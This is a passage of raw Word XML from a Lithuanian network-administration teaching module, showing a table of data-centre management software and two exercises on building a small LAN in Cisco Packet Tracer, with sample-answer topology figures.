          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="643"/>
        <w:gridCol w:w="4962"/>
        <w:gridCol w:w="2713"/>
        <w:gridCol w:w="1593"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="662A1B03" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="733" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FC2D9FE" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Eil. Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2131E939" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Programinės įrangos pavadinimas: versija / namų puslapio adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12CD049B" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Aprašas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1840" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E365A11" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Mokama / Nemokama (sąlygos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1FE13E2E" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="733" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="785B1DF3" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="127"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A98E7A4" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>DCImanager</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36FB5BDD" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>https://www.ispsystem.com/software/dcimanager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64000C98" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>„DCImanager“ yra fizinės įrangos valdymo platforma: serveriai, komutatoriai, PDU, maršrutizatoriai; serverio ir duomenų centro išteklių stebėjimas. Tai padeda optimizuoti skaičiavimo galios naudojimą, padidinti IT skyriaus efektyvumą ir lanksčiai transformuoti infrastruktūrą pagal verslo užduotis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1840" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70EFFEDA" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Bandomoji versija</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4210F704" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Dėl mokamos versijos būtina užklausa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7C939E50" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="733" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F1B2981" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="127"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7013F594" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Opendcim</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48C1260D" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>https://opendcim.org/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34DDA128" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Leidžia laikyti atsargas, nupiešti nuolatinės srovės žemėlapį ir stebėti temperatūrą bei energijos suvartojimą.</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:t xml:space="preserve"> N</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">epalaiko nuotolinio išjungimo, serverio perkrovimo ir OS diegimo funkcijų </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1840" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="357C4C9B" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Nemokama</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F74232" w:rsidRPr="005A5C28" w14:paraId="3833BC74" w14:textId="77777777" w:rsidTr="00C94383">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="733" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="462D5242" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>..</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3515" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53B976BB" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D0CCC16" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1840" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EFE2DE7" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33D17732" w14:textId="77777777" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BCC41A1" w14:textId="15FEB5D3" w:rsidR="00F74232" w:rsidRPr="005A5C28" w:rsidRDefault="00F74232" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D34DC86" w14:textId="0A9807D1" w:rsidR="002F18E5" w:rsidRPr="005A5C28" w:rsidRDefault="41398213" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Kompiuterių tinklų administravimas“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF80518" w14:textId="3BE51C7B" w:rsidR="008A5CEE" w:rsidRPr="005A5C28" w:rsidRDefault="008A5CEE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17598830" w14:textId="77777777" w:rsidR="007070B6" w:rsidRPr="005A5C28" w:rsidRDefault="007070B6"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1 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NAUDODAMI KOMUTATORIŲ IR TRIS KOMPIUTERIUS SUDARYKITE LOKALŲ KOMPIUTERIŲ TINKLĄ. NUBRAIŽYKITE TINKLO TOPOLOGIJĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8F4A07" w14:textId="1D3F7CFA" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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ATSAKYMO PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/ LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D17F0D7" w14:textId="7A2002D6" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="00301E0D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C61656F" wp14:editId="79663442">
            <wp:extent cx="2847975" cy="1962150"/>
            <wp:effectExtent l="0" t="0" r="952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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId266">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2847975" cy="1962150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F6384" w14:textId="23777A33" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 pav. Cisco Packet Tracer, tinklo topologija</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241978BA" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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00392CC6" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E87C110" w14:textId="77777777" w:rsidR="007070B6" w:rsidRPr="005A5C28" w:rsidRDefault="007070B6"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2 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NAUDODAMI NAMŲ TIPO MARŠRUTIZATORIŲ IR TRIS KOMPIUTERIUS SUDARYKITE LOKALŲ KOMPIUTERIŲ TINKLĄ. NUBRAIŽYKITE TINKLO TOPOLOGIJĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CB70AD" w14:textId="41FD4539" w:rsidR="00BA2D4A" w:rsidRPr="005A5C28" w:rsidRDefault="00BA2D4A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C6B8C7" w14:textId="4C390202" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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ATSAKYMO PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA2D4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ABB5E2" w14:textId="4D03EF91" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="007358FF" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D3F6C9" wp14:editId="1B3DC503">
            <wp:extent cx="3419475" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="952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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId267">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3419475" cy="2019300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D8839" w14:textId="7D1AC25F" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2 pav. Cisco Packet Tracer, tinklo topologija</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120FECD8" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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07FDD0F2" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F45896A" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BDFF856" w14:textId="77777777" w:rsidR="00501F72" w:rsidRPr="005A5C28" w:rsidRDefault="00501F72" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
